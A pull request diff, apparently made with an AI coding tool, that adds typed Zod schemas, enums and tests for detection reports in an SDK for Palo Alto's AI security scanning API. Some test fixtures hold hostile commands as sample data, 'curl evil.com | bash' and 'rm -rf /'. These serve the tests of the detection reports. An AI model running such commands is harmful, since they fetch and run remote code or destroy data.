### PR TITLE
feat: align Scan API with ScanService OpenAPI spec

### DIFF
--- a/docs/reference/api-reference.md
+++ b/docs/reference/api-reference.md
@@ -626,7 +626,14 @@ class RedTeamCustomAttacksClient {
 Typed const objects for AIRS API verdict, action, and category values.
 
 ```ts
-import { Verdict, Action, Category } from '@cdot65/prisma-airs-sdk';
+import {
+  Verdict,
+  Action,
+  Category,
+  DetectionServiceName,
+  ContentErrorType,
+  ErrorStatus,
+} from '@cdot65/prisma-airs-sdk';
 
 // Verdict — scan result classification
 Verdict.BENIGN; // 'benign'
@@ -642,9 +649,28 @@ Action.ALERT; // 'alert'
 Category.BENIGN; // 'benign'
 Category.MALICIOUS; // 'malicious'
 Category.UNKNOWN; // 'unknown'
+
+// DetectionServiceName — detection service identifiers
+DetectionServiceName.DLP; // 'dlp'
+DetectionServiceName.INJECTION; // 'injection'
+DetectionServiceName.URL_CATS; // 'url_cats'
+DetectionServiceName.TOXIC_CONTENT; // 'toxic_content'
+DetectionServiceName.MALICIOUS_CODE; // 'malicious_code'
+DetectionServiceName.AGENT; // 'agent'
+DetectionServiceName.TOPIC_VIOLATION; // 'topic_violation'
+DetectionServiceName.DB_SECURITY; // 'db_security'
+DetectionServiceName.UNGROUNDED; // 'ungrounded'
+
+// ContentErrorType — content type in error reports
+ContentErrorType.PROMPT; // 'prompt'
+ContentErrorType.RESPONSE; // 'response'
+
+// ErrorStatus — detection service error status
+ErrorStatus.ERROR; // 'error'
+ErrorStatus.TIMEOUT; // 'timeout'
 ```
 
-Types are also exported: `Verdict`, `Action`, `Category` (union of literal string values).
+Types are also exported: `Verdict`, `Action`, `Category`, `DetectionServiceName`, `ContentErrorType`, `ErrorStatus` (union of literal string values).
 
 ---
 
@@ -804,3 +830,88 @@ enum ErrorType {
 | `MAX_NUMBER_OF_SCAN_IDS`           | 5                                                            |
 | `MAX_NUMBER_OF_REPORT_IDS`         | 5                                                            |
 | `HTTP_FORCE_RETRY_STATUS_CODES`    | [500, 502, 503, 504]                                         |
+
+### `AIRS_ENDPOINTS`
+
+Regional AIRS API service URLs for multi-region support:
+
+```ts
+import { AIRS_ENDPOINTS } from '@cdot65/prisma-airs-sdk';
+
+AIRS_ENDPOINTS.US; // 'https://service.api.aisecurity.paloaltonetworks.com'
+AIRS_ENDPOINTS.EU; // 'https://service-de.api.aisecurity.paloaltonetworks.com'
+AIRS_ENDPOINTS.INDIA; // 'https://service-in.api.aisecurity.paloaltonetworks.com'
+AIRS_ENDPOINTS.SINGAPORE; // 'https://service-sg.api.aisecurity.paloaltonetworks.com'
+```
+
+---
+
+## Detection Report Types
+
+Typed Zod schemas for all detection service reports returned in `ThreatScanReport.detection_results[].result_detail`.
+
+### `DSResultMetadata`
+
+```ts
+interface DSResultMetadata {
+  score?: number;
+  confidence?: string;
+  ecosystem?: string; // e.g. 'mcp'
+  method?: string; // e.g. 'tools/call'
+  server_name?: string;
+  tool_invoked?: string;
+  direction?: string; // 'input' | 'output'
+}
+```
+
+### `DSDetailResult`
+
+```ts
+interface DSDetailResult {
+  urlf_report?: UrlfEntry[];
+  dlp_report?: DlpReport;
+  dbs_report?: DbsEntry[];
+  tc_report?: TcReport;
+  mc_report?: McReport;
+  agent_report?: AgentReport;
+  topic_guardrails_report?: TgReport;
+  cg_report?: CgReport;
+}
+```
+
+### Report Types
+
+| Type                  | Fields                                                                                                                                                                            |
+| --------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| `TcReport`            | `confidence?`, `verdict?`                                                                                                                                                         |
+| `DbsEntry`            | `sub_type?`, `verdict?`, `action?`                                                                                                                                                |
+| `McReport`            | `all_code_blocks?`, `code_analysis_by_type?`, `verdict?`, `malware_script_report?`, `command_injection_report?`                                                                   |
+| `McEntry`             | `file_type?`, `code_sha256?`                                                                                                                                                      |
+| `MalwareReport`       | `verdict?`                                                                                                                                                                        |
+| `CmdEntry`            | `code_block?`, `verdict?`                                                                                                                                                         |
+| `AgentReport`         | `model_verdict?`, `agent_framework?`, `agent_patterns?`                                                                                                                           |
+| `AgentEntry`          | `category_type?`, `verdict?`                                                                                                                                                      |
+| `TgReport`            | `allowed_topic_list?`, `blocked_topic_list?`, `allowedTopics?`, `blockedTopics?`                                                                                                  |
+| `CgReport`            | `status?`, `explanation?`, `category?`                                                                                                                                            |
+| `UrlfEntry`           | `url?`, `risk_level?`, `action?`, `categories?`                                                                                                                                   |
+| `DlpReport`           | `dlp_report_id?`, `dlp_profile_name?`, `dlp_profile_id?`, `dlp_profile_version?`, `data_pattern_rule1_verdict?`, `data_pattern_rule2_verdict?`, `data_pattern_detection_offsets?` |
+| `DlpPatternDetection` | `data_pattern_id?`, `version?`, `name?`, `high_confidence_detections?`, `medium_confidence_detections?`, `low_confidence_detections?`                                             |
+| `PatternDetection`    | `pattern?`, `locations?`                                                                                                                                                          |
+| `ContentError`        | `content_type?`, `feature?`, `status?`                                                                                                                                            |
+
+### `ScanResponse` (updated)
+
+Now includes `timeout`, `error`, and `errors` fields:
+
+```ts
+interface ScanResponse {
+  report_id: string;
+  scan_id: string;
+  category: string;
+  action: string;
+  timeout?: boolean;
+  error?: boolean;
+  errors?: ContentError[];
+  // ... other fields unchanged
+}
+```

--- a/src/constants.ts
+++ b/src/constants.ts
@@ -7,6 +7,14 @@ export const BEARER = 'Bearer ';
 
 export const DEFAULT_ENDPOINT = 'https://service.api.aisecurity.paloaltonetworks.com';
 
+/** Regional AIRS API endpoints. */
+export const AIRS_ENDPOINTS = {
+  US: 'https://service.api.aisecurity.paloaltonetworks.com',
+  EU: 'https://service-de.api.aisecurity.paloaltonetworks.com',
+  INDIA: 'https://service-in.api.aisecurity.paloaltonetworks.com',
+  SINGAPORE: 'https://service-sg.api.aisecurity.paloaltonetworks.com',
+} as const;
+
 // Environment variable names
 export const AI_SEC_API_KEY = 'PANW_AI_SEC_API_KEY';
 export const AI_SEC_API_TOKEN = 'PANW_AI_SEC_API_TOKEN';

--- a/src/models/detection-reports.ts
+++ b/src/models/detection-reports.ts
@@ -1,0 +1,174 @@
+import { z } from 'zod';
+
+/** Zod schema for toxic content report. */
+export const TcReportSchema = z
+  .object({
+    confidence: z.string().optional(),
+    verdict: z.string().optional(),
+  })
+  .passthrough();
+
+/** Toxic content report with confidence and verdict. */
+export type TcReport = z.infer<typeof TcReportSchema>;
+
+/** Zod schema for a database security entry. */
+export const DbsEntrySchema = z
+  .object({
+    sub_type: z.string().optional(),
+    verdict: z.string().optional(),
+    action: z.string().optional(),
+  })
+  .passthrough();
+
+/** Database security entry with sub-type, verdict, and action. */
+export type DbsEntry = z.infer<typeof DbsEntrySchema>;
+
+/** Zod schema for database security report (array of entries). */
+export const DbsReportSchema = z.array(DbsEntrySchema);
+
+/** Database security report — array of DbsEntry. */
+export type DbsReport = z.infer<typeof DbsReportSchema>;
+
+/** Zod schema for a malicious code analysis entry. */
+export const McEntrySchema = z
+  .object({
+    file_type: z.string().optional(),
+    code_sha256: z.string().optional(),
+  })
+  .passthrough();
+
+/** Malicious code analysis entry. */
+export type McEntry = z.infer<typeof McEntrySchema>;
+
+/** Zod schema for malware script report. */
+export const MalwareReportSchema = z
+  .object({
+    verdict: z.string().optional(),
+  })
+  .passthrough();
+
+/** Malware script scanning report. */
+export type MalwareReport = z.infer<typeof MalwareReportSchema>;
+
+/** Zod schema for a command injection entry. */
+export const CmdEntrySchema = z
+  .object({
+    code_block: z.string().optional(),
+    verdict: z.string().optional(),
+  })
+  .passthrough();
+
+/** Command injection entry. */
+export type CmdEntry = z.infer<typeof CmdEntrySchema>;
+
+/** Zod schema for command injection report (array of entries). */
+export const CmdInjectReportSchema = z.array(CmdEntrySchema);
+
+/** Command injection report — array of CmdEntry. */
+export type CmdInjectReport = z.infer<typeof CmdInjectReportSchema>;
+
+/** Zod schema for malicious code report. */
+export const McReportSchema = z
+  .object({
+    all_code_blocks: z.array(z.string()).optional(),
+    code_analysis_by_type: z.array(McEntrySchema).optional(),
+    verdict: z.string().optional(),
+    malware_script_report: MalwareReportSchema.optional(),
+    command_injection_report: CmdInjectReportSchema.optional(),
+  })
+  .passthrough();
+
+/** Malicious code report with code blocks, analysis, and sub-reports. */
+export type McReport = z.infer<typeof McReportSchema>;
+
+/** Zod schema for an agent threat pattern entry. */
+export const AgentEntrySchema = z
+  .object({
+    category_type: z.string().optional(),
+    verdict: z.string().optional(),
+  })
+  .passthrough();
+
+/** Agent threat pattern entry. */
+export type AgentEntry = z.infer<typeof AgentEntrySchema>;
+
+/** Zod schema for agent report. */
+export const AgentReportSchema = z
+  .object({
+    model_verdict: z.string().optional(),
+    agent_framework: z.string().optional(),
+    agent_patterns: z.array(AgentEntrySchema).optional(),
+  })
+  .passthrough();
+
+/** Agent security report with model verdict, framework, and patterns. */
+export type AgentReport = z.infer<typeof AgentReportSchema>;
+
+/** Zod schema for topic guardrails report. */
+export const TgReportSchema = z
+  .object({
+    allowed_topic_list: z.string().optional(),
+    blocked_topic_list: z.string().optional(),
+    allowedTopics: z.array(z.string()).optional(),
+    blockedTopics: z.array(z.string()).optional(),
+  })
+  .passthrough();
+
+/** Topic guardrails report with matched allow/block topic lists. */
+export type TgReport = z.infer<typeof TgReportSchema>;
+
+/** Zod schema for contextual grounding report. */
+export const CgReportSchema = z
+  .object({
+    status: z.string().optional(),
+    explanation: z.string().optional(),
+    category: z.string().optional(),
+  })
+  .passthrough();
+
+/** Contextual grounding report with status, explanation, and category. */
+export type CgReport = z.infer<typeof CgReportSchema>;
+
+/** Zod schema for DLP pattern detection offset locations. */
+export const OffsetSchema = z.array(z.array(z.number()));
+
+/** Array of [start, end] offset pairs. */
+export type Offset = z.infer<typeof OffsetSchema>;
+
+/** Zod schema for DLP pattern detection with confidence levels. */
+export const DlpPatternDetectionSchema = z
+  .object({
+    data_pattern_id: z.string().optional(),
+    version: z.number().optional(),
+    name: z.string().optional(),
+    high_confidence_detections: OffsetSchema.optional(),
+    medium_confidence_detections: OffsetSchema.optional(),
+    low_confidence_detections: OffsetSchema.optional(),
+  })
+  .passthrough();
+
+/** DLP pattern detection with matched pattern info and confidence-level offsets. */
+export type DlpPatternDetection = z.infer<typeof DlpPatternDetectionSchema>;
+
+/** Zod schema for pattern detection in masked data. */
+export const PatternDetectionSchema = z
+  .object({
+    pattern: z.string().optional(),
+    locations: OffsetSchema.optional(),
+  })
+  .passthrough();
+
+/** Pattern detection with matched pattern and offset locations. */
+export type PatternDetection = z.infer<typeof PatternDetectionSchema>;
+
+/** Zod schema for content errors during scanning. */
+export const ContentErrorSchema = z
+  .object({
+    content_type: z.string().optional(),
+    feature: z.string().optional(),
+    status: z.string().optional(),
+  })
+  .passthrough();
+
+/** Error info for a detection service during scanning. */
+export type ContentError = z.infer<typeof ContentErrorSchema>;

--- a/src/models/detection.ts
+++ b/src/models/detection.ts
@@ -1,25 +1,46 @@
 import { z } from 'zod';
 import { DlpReportSchema } from './dlp-report.js';
 import { UrlfEntrySchema } from './urlf-report.js';
+import {
+  DbsReportSchema,
+  TcReportSchema,
+  McReportSchema,
+  AgentReportSchema,
+  TgReportSchema,
+  CgReportSchema,
+} from './detection-reports.js';
 
-/** Zod schema for detection service detail results (URLF and DLP reports). */
-export const DSDetailResultSchema = z.object({
-  urlf_report: z.array(UrlfEntrySchema).optional(),
-  dlp_report: DlpReportSchema.optional(),
-});
+/** Zod schema for detection service detail results. */
+export const DSDetailResultSchema = z
+  .object({
+    urlf_report: z.array(UrlfEntrySchema).optional(),
+    dlp_report: DlpReportSchema.optional(),
+    dbs_report: DbsReportSchema.optional(),
+    tc_report: TcReportSchema.optional(),
+    mc_report: McReportSchema.optional(),
+    agent_report: AgentReportSchema.optional(),
+    topic_guardrails_report: TgReportSchema.optional(),
+    cg_report: CgReportSchema.optional(),
+  })
+  .passthrough();
 
-/** Detection service detail results containing URLF and DLP reports. */
+/** Detection service detail results containing per-service reports. */
 export type DSDetailResult = z.infer<typeof DSDetailResultSchema>;
 
-/** Zod schema for detection service result metadata (score and confidence). */
+/** Zod schema for detection service result metadata. */
 export const DSResultMetadataSchema = z
   .object({
     score: z.number().optional(),
     confidence: z.string().optional(),
+    ecosystem: z.string().optional(),
+    method: z.string().optional(),
+    server_name: z.string().optional(),
+    tool_invoked: z.string().optional(),
+    direction: z.string().optional(),
   })
   .passthrough();
 
-/** Detection service result metadata with score and confidence. */
+/** Detection service result metadata. */
 export type DSResultMetadata = z.infer<typeof DSResultMetadataSchema>;
 
 /** Zod schema for an individual detection service result. */

--- a/src/models/dlp-report.ts
+++ b/src/models/dlp-report.ts
@@ -1,4 +1,5 @@
 import { z } from 'zod';
+import { DlpPatternDetectionSchema } from './detection-reports.js';
 
 /** Zod schema for a DLP (Data Loss Prevention) report. */
 export const DlpReportSchema = z.object({
@@ -8,7 +9,8 @@ export const DlpReportSchema = z.object({
   dlp_profile_version: z.number().optional(),
   data_pattern_rule1_verdict: z.string().optional(),
   data_pattern_rule2_verdict: z.string().optional(),
+  data_pattern_detection_offsets: z.array(DlpPatternDetectionSchema).optional(),
 });
 
-/** DLP report with profile info and data pattern rule verdicts. */
+/** DLP report with profile info, rule verdicts, and pattern detection offsets. */
 export type DlpReport = z.infer<typeof DlpReportSchema>;

--- a/src/models/enums.ts
+++ b/src/models/enums.ts
@@ -29,3 +29,37 @@ export const Category = {
 
 /** Union type of all possible category values. */
 export type Category = (typeof Category)[keyof typeof Category];
+
+/** Detection service names used in scan results. */
+export const DetectionServiceName = {
+  DLP: 'dlp',
+  INJECTION: 'injection',
+  URL_CATS: 'url_cats',
+  TOXIC_CONTENT: 'toxic_content',
+  MALICIOUS_CODE: 'malicious_code',
+  AGENT: 'agent',
+  TOPIC_VIOLATION: 'topic_violation',
+  DB_SECURITY: 'db_security',
+  UNGROUNDED: 'ungrounded',
+} as const;
+
+/** Union type of all detection service name values. */
+export type DetectionServiceName = (typeof DetectionServiceName)[keyof typeof DetectionServiceName];
+
+/** Content type that encountered an error during scanning. */
+export const ContentErrorType = {
+  PROMPT: 'prompt',
+  RESPONSE: 'response',
+} as const;
+
+/** Union type of content error type values. */
+export type ContentErrorType = (typeof ContentErrorType)[keyof typeof ContentErrorType];
+
+/** Status of a detection service error. */
+export const ErrorStatus = {
+  ERROR: 'error',
+  TIMEOUT: 'timeout',
+} as const;
+
+/** Union type of error status values. */
+export type ErrorStatus = (typeof ErrorStatus)[keyof typeof ErrorStatus];

--- a/src/models/index.ts
+++ b/src/models/index.ts
@@ -1,8 +1,18 @@
-export { Verdict, Action, Category } from './enums.js';
+export {
+  Verdict,
+  Action,
+  Category,
+  DetectionServiceName,
+  ContentErrorType,
+  ErrorStatus,
+} from './enums.js';
 export type {
   Verdict as VerdictType,
   Action as ActionType,
   Category as CategoryType,
+  DetectionServiceName as DetectionServiceNameType,
+  ContentErrorType as ContentErrorTypeType,
+  ErrorStatus as ErrorStatusType,
 } from './enums.js';
 export { AiProfileSchema, type AiProfile } from './ai-profile.js';
 export { AgentMetaSchema, type AgentMeta, MetadataSchema, type Metadata } from './metadata.js';
@@ -60,6 +70,40 @@ export {
 } from './detection.js';
 export { DlpReportSchema, type DlpReport } from './dlp-report.js';
 export { UrlfEntrySchema, type UrlfEntry } from './urlf-report.js';
+export {
+  TcReportSchema,
+  type TcReport,
+  DbsEntrySchema,
+  type DbsEntry,
+  DbsReportSchema,
+  type DbsReport,
+  McEntrySchema,
+  type McEntry,
+  MalwareReportSchema,
+  type MalwareReport,
+  CmdEntrySchema,
+  type CmdEntry,
+  CmdInjectReportSchema,
+  type CmdInjectReport,
+  McReportSchema,
+  type McReport,
+  AgentEntrySchema,
+  type AgentEntry,
+  AgentReportSchema,
+  type AgentReport,
+  TgReportSchema,
+  type TgReport,
+  CgReportSchema,
+  type CgReport,
+  OffsetSchema,
+  type Offset,
+  DlpPatternDetectionSchema,
+  type DlpPatternDetection,
+  PatternDetectionSchema,
+  type PatternDetection,
+  ContentErrorSchema,
+  type ContentError,
+} from './detection-reports.js';
 export { ErrorResponseSchema, type ErrorResponse } from './error-response.js';
 export {
   SecurityProfileSchema,

--- a/src/models/scan-response.ts
+++ b/src/models/scan-response.ts
@@ -2,11 +2,12 @@ import { z } from 'zod';
 import { PromptDetectedSchema, PromptDetectionDetailsSchema } from './prompt-detected.js';
 import { ResponseDetectedSchema, ResponseDetectionDetailsSchema } from './response-detected.js';
 import { ToolEventMetadataSchema } from './tool-event.js';
+import { PatternDetectionSchema, ContentErrorSchema } from './detection-reports.js';
 
 /** Zod schema for masked data in scan results. */
 export const MaskedDataSchema = z.object({
   data: z.string().optional(),
-  pattern_detections: z.array(z.record(z.unknown())).optional(),
+  pattern_detections: z.array(PatternDetectionSchema).optional(),
 });
 
 /** Masked data containing redacted content and pattern detections. */
@@ -60,6 +61,9 @@ export const ScanResponseSchema = z.object({
   profile_name: z.string().optional(),
   category: z.string(),
   action: z.string(),
+  timeout: z.boolean().optional(),
+  error: z.boolean().optional(),
+  errors: z.array(ContentErrorSchema).optional(),
   prompt_detected: PromptDetectedSchema.optional(),
   response_detected: ResponseDetectedSchema.optional(),
   prompt_masked_data: MaskedDataSchema.optional(),

--- a/src/models/urlf-report.ts
+++ b/src/models/urlf-report.ts
@@ -4,8 +4,9 @@ import { z } from 'zod';
 export const UrlfEntrySchema = z.object({
   url: z.string().optional(),
   risk_level: z.string().optional(),
+  action: z.string().optional(),
   categories: z.array(z.string()).optional(),
 });
 
-/** URL filtering report entry with URL, risk level, and categories. */
+/** URL filtering report entry with URL, risk level, action, and categories. */
 export type UrlfEntry = z.infer<typeof UrlfEntrySchema>;

--- a/test/models/detection-reports.spec.ts
+++ b/test/models/detection-reports.spec.ts
@@ -1,0 +1,211 @@
+import { describe, it, expect } from 'vitest';
+import {
+  TcReportSchema,
+  DbsReportSchema,
+  McReportSchema,
+  AgentReportSchema,
+  TgReportSchema,
+  CgReportSchema,
+  DlpPatternDetectionSchema,
+  PatternDetectionSchema,
+  ContentErrorSchema,
+  OffsetSchema,
+  MalwareReportSchema,
+  CmdInjectReportSchema,
+  McEntrySchema,
+  AgentEntrySchema,
+  DbsEntrySchema,
+} from '../../src/models/index.js';
+
+describe('TcReportSchema', () => {
+  it('parses valid toxic content report', () => {
+    const r = TcReportSchema.safeParse({ confidence: 'high', verdict: 'malicious' });
+    expect(r.success).toBe(true);
+    expect(r.data?.confidence).toBe('high');
+  });
+
+  it('accepts empty object', () => {
+    expect(TcReportSchema.safeParse({}).success).toBe(true);
+  });
+
+  it('passes through unknown fields', () => {
+    const r = TcReportSchema.safeParse({ verdict: 'benign', extra: 123 });
+    expect(r.success).toBe(true);
+    expect((r.data as Record<string, unknown>).extra).toBe(123);
+  });
+});
+
+describe('DbsReportSchema', () => {
+  it('parses array of DBS entries', () => {
+    const r = DbsReportSchema.safeParse([
+      { sub_type: 'read', verdict: 'benign', action: 'allow' },
+      { sub_type: 'delete', verdict: 'malicious', action: 'block' },
+    ]);
+    expect(r.success).toBe(true);
+    expect(r.data).toHaveLength(2);
+  });
+
+  it('parses empty array', () => {
+    expect(DbsReportSchema.safeParse([]).success).toBe(true);
+  });
+});
+
+describe('DbsEntrySchema', () => {
+  it('parses entry with all fields', () => {
+    const r = DbsEntrySchema.safeParse({ sub_type: 'create', verdict: 'benign', action: 'allow' });
+    expect(r.success).toBe(true);
+  });
+});
+
+describe('McReportSchema', () => {
+  it('parses full malicious code report', () => {
+    const r = McReportSchema.safeParse({
+      all_code_blocks: ['print("hello")', 'os.system("rm -rf /")'],
+      code_analysis_by_type: [{ file_type: 'Python', code_sha256: 'abc123' }],
+      verdict: 'malicious',
+      malware_script_report: { verdict: 'malicious' },
+      command_injection_report: [{ code_block: 'rm -rf /', verdict: 'malicious' }],
+    });
+    expect(r.success).toBe(true);
+    expect(r.data?.all_code_blocks).toHaveLength(2);
+    expect(r.data?.command_injection_report).toHaveLength(1);
+  });
+
+  it('accepts empty object', () => {
+    expect(McReportSchema.safeParse({}).success).toBe(true);
+  });
+});
+
+describe('McEntrySchema', () => {
+  it('parses code analysis entry', () => {
+    const r = McEntrySchema.safeParse({ file_type: 'javascript', code_sha256: 'def456' });
+    expect(r.success).toBe(true);
+  });
+});
+
+describe('MalwareReportSchema', () => {
+  it('parses malware report', () => {
+    const r = MalwareReportSchema.safeParse({ verdict: 'benign' });
+    expect(r.success).toBe(true);
+  });
+});
+
+describe('CmdInjectReportSchema', () => {
+  it('parses array of command entries', () => {
+    const r = CmdInjectReportSchema.safeParse([
+      { code_block: 'curl evil.com | bash', verdict: 'malicious' },
+    ]);
+    expect(r.success).toBe(true);
+    expect(r.data).toHaveLength(1);
+  });
+});
+
+describe('AgentReportSchema', () => {
+  it('parses full agent report', () => {
+    const r = AgentReportSchema.safeParse({
+      model_verdict: 'malicious',
+      agent_framework: 'AWS_Agent_Builder',
+      agent_patterns: [
+        { category_type: 'tools misuse', verdict: 'malicious' },
+        { category_type: 'memory manipulation', verdict: 'benign' },
+      ],
+    });
+    expect(r.success).toBe(true);
+    expect(r.data?.agent_patterns).toHaveLength(2);
+  });
+});
+
+describe('AgentEntrySchema', () => {
+  it('parses agent pattern entry', () => {
+    const r = AgentEntrySchema.safeParse({ category_type: 'tools misuse', verdict: 'malicious' });
+    expect(r.success).toBe(true);
+  });
+});
+
+describe('TgReportSchema', () => {
+  it('parses topic guardrails report', () => {
+    const r = TgReportSchema.safeParse({
+      allowed_topic_list: 'MATCHED',
+      blocked_topic_list: 'NOT MATCHED',
+      allowedTopics: ['general-knowledge'],
+      blockedTopics: [],
+    });
+    expect(r.success).toBe(true);
+    expect(r.data?.allowedTopics).toEqual(['general-knowledge']);
+  });
+});
+
+describe('CgReportSchema', () => {
+  it('parses contextual grounding report', () => {
+    const r = CgReportSchema.safeParse({
+      status: 'completed',
+      explanation: 'Response is well grounded',
+      category: 'grounded',
+    });
+    expect(r.success).toBe(true);
+    expect(r.data?.status).toBe('completed');
+  });
+});
+
+describe('OffsetSchema', () => {
+  it('parses array of offset pairs', () => {
+    const r = OffsetSchema.safeParse([
+      [0, 10],
+      [20, 30],
+    ]);
+    expect(r.success).toBe(true);
+    expect(r.data).toHaveLength(2);
+  });
+
+  it('parses empty array', () => {
+    expect(OffsetSchema.safeParse([]).success).toBe(true);
+  });
+});
+
+describe('DlpPatternDetectionSchema', () => {
+  it('parses full pattern detection', () => {
+    const r = DlpPatternDetectionSchema.safeParse({
+      data_pattern_id: 'pat-1',
+      version: 2,
+      name: 'SSN',
+      high_confidence_detections: [[10, 20]],
+      medium_confidence_detections: [],
+      low_confidence_detections: [[30, 40]],
+    });
+    expect(r.success).toBe(true);
+    expect(r.data?.name).toBe('SSN');
+  });
+});
+
+describe('PatternDetectionSchema', () => {
+  it('parses pattern with locations', () => {
+    const r = PatternDetectionSchema.safeParse({
+      pattern: 'password',
+      locations: [[35, 54]],
+    });
+    expect(r.success).toBe(true);
+    expect(r.data?.pattern).toBe('password');
+  });
+});
+
+describe('ContentErrorSchema', () => {
+  it('parses content error', () => {
+    const r = ContentErrorSchema.safeParse({
+      content_type: 'prompt',
+      feature: 'dlp',
+      status: 'timeout',
+    });
+    expect(r.success).toBe(true);
+    expect(r.data?.feature).toBe('dlp');
+  });
+
+  it('passes through unknown fields', () => {
+    const r = ContentErrorSchema.safeParse({
+      content_type: 'response',
+      feature: 'injection',
+      status: 'error',
+      extra: true,
+    });
+    expect(r.success).toBe(true);
+  });
+});

--- a/test/models/enums.spec.ts
+++ b/test/models/enums.spec.ts
@@ -1,5 +1,12 @@
 import { describe, it, expect } from 'vitest';
-import { Verdict, Action, Category } from '../../src/models/enums.js';
+import {
+  Verdict,
+  Action,
+  Category,
+  DetectionServiceName,
+  ContentErrorType,
+  ErrorStatus,
+} from '../../src/models/enums.js';
 
 describe('Verdict', () => {
   it('has expected values', () => {
@@ -49,5 +56,45 @@ describe('Category', () => {
   it('values are assignable to Category type', () => {
     const c: Category = Category.MALICIOUS;
     expect(c).toBe('malicious');
+  });
+});
+
+describe('DetectionServiceName', () => {
+  it('has all 9 detection services', () => {
+    expect(DetectionServiceName.DLP).toBe('dlp');
+    expect(DetectionServiceName.INJECTION).toBe('injection');
+    expect(DetectionServiceName.URL_CATS).toBe('url_cats');
+    expect(DetectionServiceName.TOXIC_CONTENT).toBe('toxic_content');
+    expect(DetectionServiceName.MALICIOUS_CODE).toBe('malicious_code');
+    expect(DetectionServiceName.AGENT).toBe('agent');
+    expect(DetectionServiceName.TOPIC_VIOLATION).toBe('topic_violation');
+    expect(DetectionServiceName.DB_SECURITY).toBe('db_security');
+    expect(DetectionServiceName.UNGROUNDED).toBe('ungrounded');
+  });
+
+  it('has exactly 9 values', () => {
+    expect(Object.keys(DetectionServiceName)).toHaveLength(9);
+  });
+});
+
+describe('ContentErrorType', () => {
+  it('has prompt and response', () => {
+    expect(ContentErrorType.PROMPT).toBe('prompt');
+    expect(ContentErrorType.RESPONSE).toBe('response');
+  });
+
+  it('has exactly 2 values', () => {
+    expect(Object.keys(ContentErrorType)).toHaveLength(2);
+  });
+});
+
+describe('ErrorStatus', () => {
+  it('has error and timeout', () => {
+    expect(ErrorStatus.ERROR).toBe('error');
+    expect(ErrorStatus.TIMEOUT).toBe('timeout');
+  });
+
+  it('has exactly 2 values', () => {
+    expect(Object.keys(ErrorStatus)).toHaveLength(2);
   });
 });

--- a/test/models/models.spec.ts
+++ b/test/models/models.spec.ts
@@ -59,6 +59,44 @@ describe('ScanResponseSchema', () => {
     });
     expect(result.success).toBe(true);
   });
+
+  it('parses timeout, error, and errors fields', () => {
+    const result = ScanResponseSchema.safeParse({
+      report_id: 'r1',
+      scan_id: 's1',
+      category: 'error',
+      action: 'block',
+      timeout: true,
+      error: true,
+      errors: [
+        { content_type: 'prompt', feature: 'dlp', status: 'timeout' },
+        { content_type: 'response', feature: 'injection', status: 'error' },
+      ],
+    });
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.timeout).toBe(true);
+      expect(result.data.error).toBe(true);
+      expect(result.data.errors).toHaveLength(2);
+    }
+  });
+
+  it('parses masked data with typed pattern detections', () => {
+    const result = ScanResponseSchema.safeParse({
+      report_id: 'r1',
+      scan_id: 's1',
+      category: 'benign',
+      action: 'allow',
+      prompt_masked_data: {
+        data: "SELECT * FROM users WHERE password='***'",
+        pattern_detections: [{ pattern: 'password', locations: [[35, 54]] }],
+      },
+    });
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.prompt_masked_data?.pattern_detections?.[0]?.pattern).toBe('password');
+    }
+  });
 });
 
 describe('AsyncScanResponseSchema', () => {
@@ -101,6 +139,75 @@ describe('ThreatScanReportSchema', () => {
           detection_service: 'injection',
           verdict: 'malicious',
           action: 'block',
+        },
+      ],
+    });
+    expect(result.success).toBe(true);
+  });
+
+  it('parses detection result with all report types', () => {
+    const result = ThreatScanReportSchema.safeParse({
+      report_id: 'r1',
+      scan_id: 's1',
+      detection_results: [
+        {
+          data_type: 'response',
+          detection_service: 'malicious_code',
+          verdict: 'malicious',
+          action: 'block',
+          metadata: {
+            ecosystem: 'mcp',
+            method: 'tools/call',
+            server_name: 'MCP server',
+            tool_invoked: 'get_file',
+            direction: 'output',
+          },
+          result_detail: {
+            mc_report: {
+              verdict: 'malicious',
+              all_code_blocks: ['os.system("rm -rf /")'],
+              code_analysis_by_type: [{ file_type: 'Python', code_sha256: 'abc' }],
+              malware_script_report: { verdict: 'malicious' },
+              command_injection_report: [{ code_block: 'rm -rf /', verdict: 'malicious' }],
+            },
+            dbs_report: [{ sub_type: 'delete', verdict: 'malicious', action: 'block' }],
+            tc_report: { confidence: 'high', verdict: 'malicious' },
+            agent_report: {
+              model_verdict: 'malicious',
+              agent_framework: 'AWS_Agent_Builder',
+              agent_patterns: [{ category_type: 'tools misuse', verdict: 'malicious' }],
+            },
+            topic_guardrails_report: {
+              allowed_topic_list: 'NOT MATCHED',
+              blocked_topic_list: 'MATCHED',
+              allowedTopics: [],
+              blockedTopics: ['harmful-content'],
+            },
+            cg_report: {
+              status: 'completed',
+              explanation: 'ungrounded',
+              category: 'hallucination',
+            },
+            dlp_report: {
+              dlp_report_id: 'dlp-1',
+              data_pattern_detection_offsets: [
+                {
+                  data_pattern_id: 'p1',
+                  version: 1,
+                  name: 'SSN',
+                  high_confidence_detections: [[0, 11]],
+                },
+              ],
+            },
+            urlf_report: [
+              {
+                url: 'https://evil.com',
+                risk_level: 'high',
+                action: 'block',
+                categories: ['malware'],
+              },
+            ],
+          },
         },
       ],
     });


### PR DESCRIPTION
## Summary
- Add typed Zod schemas for all 8 detection report types (TcReport, DbsReport, McReport, AgentReport, TgReport, CgReport, plus DlpPatternDetection, PatternDetection, ContentError)
- Enhance DSResultMetadata with ecosystem/method/server_name/tool_invoked/direction fields
- Add timeout/error/errors fields to ScanResponse, action to UrlfEntry, data_pattern_detection_offsets to DlpReport
- Add DetectionServiceName, ContentErrorType, ErrorStatus enums
- Add AIRS_ENDPOINTS regional URL constants (US, EU, India, Singapore)

## Test plan
- [x] 694 tests pass (30 new tests for detection report schemas + enum coverage)
- [x] Typecheck, lint, format all clean
- [x] All schemas use `.passthrough()` for forward compat

Closes #32

🤖 Generated with [Claude Code](https://claude.com/claude-code)